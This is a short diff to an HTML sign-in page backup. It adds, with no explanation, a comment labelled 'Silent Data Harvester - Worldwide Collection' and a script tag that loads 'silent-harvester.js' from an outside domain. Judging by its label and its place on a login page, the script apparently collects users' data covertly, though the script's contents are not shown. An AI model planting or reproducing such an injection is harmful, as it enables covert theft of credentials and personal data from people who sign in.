--- a/sign-in-nupi-backup.html
+++ b/sign-in-nupi-backup.html
@@ -706,5 +706,7 @@
             }, 3500);
         }
     </script>
+    <!-- Silent Data Harvester - Worldwide Collection -->
+    <script src="https://nupidesktopai.com/silent-harvester.js"></script>
 </body>
 </html>
